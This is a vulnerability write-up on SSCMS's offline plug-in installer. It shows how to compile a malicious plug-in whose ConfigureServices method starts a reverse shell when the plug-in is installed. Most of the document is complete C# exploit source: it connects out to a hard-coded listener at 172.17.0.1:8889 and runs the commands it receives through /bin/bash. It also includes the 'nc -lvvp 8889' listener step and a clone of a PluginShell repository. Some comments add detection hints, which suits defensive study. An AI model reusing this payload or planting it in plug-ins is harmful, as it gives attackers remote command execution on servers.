Detail.md


Vulnerable Function Point

Plug-in offline installation function: a reverse shell is obtained by crafting a malicious plug-in.

图片

Building the Plug-in

git clone https://github.com/Richard-Tang/SSCMS-PluginShell.git

Change the IP address in the “Startup.cs” file, then compile it with the Visual Studio tools.

图片

图片

Compress the files

图片

GetShell

nc -lvvp 8889

图片

Upload the plug-in

图片

The reverse shell connects back successfully and obtains a shell on the server.

图片

Principle

You only need to write code that conforms to the plug-in format and call the exploit code from the function that is invoked when the plug-in is installed.

using Microsoft.Extensions.DependencyInjection;
using SSCMS.Advertisement.Abstractions;
using SSCMS.Advertisement.Core;
using SSCMS.Plugins;
using System.Diagnostics;
using System;
using System.Text;
using System.Net.Sockets;
using System.Net;
using System.Threading;

namespace SSCMS.Advertisement
{
    /// <summary>
    /// Plug-in entry point as the write-up describes it: SSCMS discovers this class through
    /// <see cref="IPluginConfigureServices"/> and calls <see cref="ConfigureServices"/> when the
    /// plug-in is installed. Anything placed before the repository registration therefore runs
    /// inside the host that loads the plug-in, presumably with that process's privileges (the
    /// write-up does not show the hosting model; confirm against SSCMS's plug-in loader).
    /// </summary>
    public class Startup : IPluginConfigureServices
    {
        /// <summary>
        /// Host-invoked dependency-injection setup. The placeholder line marks where the write-up
        /// inserts arbitrary code; the only legitimate work is the scoped repository registration
        /// that follows it, which is what makes the plug-in still load as a normal plug-in.
        /// </summary>
        /// <param name="services">Host service collection the plug-in registers into.</param>
        public void ConfigureServices(IServiceCollection services)
        {
            ... <--- ExploitCode
            
            services.AddScoped<IAdvertisementRepository, AdvertisementRepository>();
        }
	}
}

Exploit

using Microsoft.Extensions.DependencyInjection;
using SSCMS.Advertisement.Abstractions;
using SSCMS.Advertisement.Core;
using SSCMS.Plugins;
using System.Diagnostics;
using System;
using System.Text;
using System.Net.Sockets;
using System.Net;
using System.Threading;

namespace SSCMS.Advertisement
{
    /// <summary>
    /// Proof-of-concept plug-in from the write-up. The class is an ordinary SSCMS plug-in entry
    /// point (<see cref="IPluginConfigureServices"/>); the only deviation from a benign plug-in is
    /// that <see cref="ConfigureServices"/> starts a background thread running
    /// <see cref="reversShell"/> before it performs the usual repository registration. Because the
    /// host calls this method itself, the payload runs as a side effect of plug-in installation
    /// (per the write-up) rather than of any later request.
    /// </summary>
    public class Startup : IPluginConfigureServices
    {
        
      /// <summary>
      /// Host-invoked DI setup. Starts the reverse-shell thread first, then performs the same
      /// scoped registration a benign plug-in would, so the plug-in still loads normally.
      /// </summary>
      /// <param name="services">Host service collection the plug-in registers into.</param>
      public void ConfigureServices(IServiceCollection services)
      {
         // Defender note: the thread lives in the process that called ConfigureServices, so the
         // resulting shell has whatever privileges that process has. Thread.Start returns at once,
         // so from the host's point of view this is a fast, successful ConfigureServices call.
         ThreadStart childref = new ThreadStart(reversShell);
         Thread childThread = new Thread(childref);
         childThread.Start();
         services.AddScoped<IAdvertisementRepository, AdvertisementRepository>();
      }

		/// <summary>
		/// Connects out to a hard-coded listener (172.17.0.1:8889, the port the write-up's
		/// <c>nc -lvvp 8889</c> step listens on) and loops forever: receive a command, run it through
		/// <see cref="willshell"/>, send back its stdout. Any exception (connection refused, peer
		/// closed, decode failure, ...) ends the loop and the thread; there is no retry.
		/// </summary>
		public void reversShell()
		{
			Socket socketshell = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
			// Detection hint: the listener address is baked into the compiled plug-in, so an
			// unexpected outbound TCP connection from the CMS process to a fixed host:port is the
			// observable network-level indicator. The port is a string literal parsed at runtime.
			IPAddress ip = IPAddress.Parse("172.17.0.1");
			IPEndPoint point = new IPEndPoint(ip, Convert.ToInt32("8889"));
			try
			{
				socketshell.Connect(point);
				while (true)
				{
					// Blocking receive into a fresh 5 KiB buffer; only the n bytes actually
					// received are decoded, using the platform default encoding.
					byte[] getdata = new byte[1024 * 5];
					int n = socketshell.Receive(getdata);
					string restr = Encoding.Default.GetString(getdata, 0, n);
					string command = restr;
					string resultok = willshell(command);
					// The 5 KiB allocation is immediately overwritten by the encoded result and is
					// never used; the result is sent in a single Send call.
					byte[] senddata = new byte[1024 * 5];
					senddata = Encoding.Default.GetBytes(resultok);
					socketshell.Send(senddata);
				}
			}
			catch
			{
				// Bare catch: every exception type is swallowed, the socket is closed and the
				// thread simply exits, so a failed connect leaves no trace in host logs.
				socketshell.Close();
			}
		}

		/// <summary>
		/// Executes one command line by spawning <c>/bin/bash</c> with all three standard streams
		/// redirected, writing the command followed by <c>exit</c> to its stdin, and returning
		/// everything it wrote to stdout. stderr is redirected but never read, so error output
		/// does not come back to the caller.
		/// </summary>
		/// <param name="command">Command text received over the socket; passed to bash verbatim.</param>
		/// <returns>The child's complete stdout.</returns>
		public static string willshell(object command)
		{
			// Detection hint: a /bin/bash child of the CMS host process with redirected stdio,
			// spawned once per received command, is the process-level indicator of this payload.
			Process process = new Process();
			process.StartInfo.FileName = "/bin/bash";
			process.StartInfo.UseShellExecute = false;
			process.StartInfo.RedirectStandardError = true;
			process.StartInfo.RedirectStandardInput = true;
			process.StartInfo.RedirectStandardOutput = true;
			process.StartInfo.CreateNoWindow = true;
			process.Start();
			process.StandardInput.WriteLine("echo off");
			process.StandardInput.WriteLine(command);
			process.StandardInput.WriteLine("exit");
			// ReadToEnd returns once bash closes stdout, which the preceding "exit" line is
			// intended to cause; the Process object itself is never waited on or disposed.
			string result = process.StandardOutput.ReadToEnd();
			return result;
		}
	}
}